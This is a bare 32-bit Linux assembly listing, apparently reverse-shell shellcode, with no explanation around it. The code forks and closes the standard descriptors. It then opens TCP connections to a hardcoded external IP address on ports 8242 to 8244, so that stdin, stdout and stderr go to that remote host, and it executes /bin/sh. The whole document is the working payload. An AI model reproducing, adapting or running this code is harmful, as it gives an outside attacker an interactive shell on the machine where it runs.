1 BITS 32 2 xor eax, eax 3 mov al, 2 4 int 80h 5 cmp eax, 0 6 je child 7 ret 8 exit: 9 xor eax, eax 10 inc eax 11 int 80h 12 child: 13 xor ebx, ebx 14 push ebx 15 l0: 16 mov ebx, [esp] 17 mov al, 6 18 int 80h 19 inc byte [esp] 20 cmp byte [esp], 3 21 je l1 22 jmp l0 23 l1: 24 mov dx,8242 25 call bhcon 26 mov dx,8243 27 call bhcon 28 mov dx,8244 29 call bhcon 30 jmp mstr 31 havestr: 32 pop ebx 33 xor eax, eax 34 mov al, 11 35 xor ecx, ecx 36 push ecx 37 push ebx 38 mov ecx, esp 39 xor edx, edx 40 int 80h 41 mov eax, 1 42 int 80h 43 mstr: 44 call havestr 45 db "/bin/sh",0 46 47 ; di - port 48 bhcon: 49 mov [esp-16], dx 50 mov dword [esp-12], 2 51 mov dword [esp-8], 1 52 mov dword [esp-4], 0 53 mov eax,102 54 mov ebx,1 55 mov ecx,esp 56 sub ecx,12 57 int 80h 58 xor ecx, ecx 59 mov byte [esp-32], 2 60 mov [esp-31], cl 61 mov dx, [esp-16] 62 mov [esp-30], dh 63 mov [esp-29], dl 64 mov dword [esp-28], 0x22eaf05c 65 mov [esp-24], ecx 66 mov [esp-20], ecx 67 mov [esp-12], eax 68 mov [esp-8], esp 69 sub dword [esp-8], 32 70 mov dword [esp-4], 16 71 mov eax,102 72 mov ebx,3 73 mov ecx,esp 74 sub ecx,12 75 int 80h 76 cmp eax, 0 77 jne exit 78 79 ; mov dword [esp-16], 0xDEAD1234 80 ; mov eax, 4 81 ; mov ebx, [esp-12] 82 ; mov ecx, esp 83 ; sub ecx, 16 84 ; mov edx, 4 85 ; int 80h 86 87 ret 88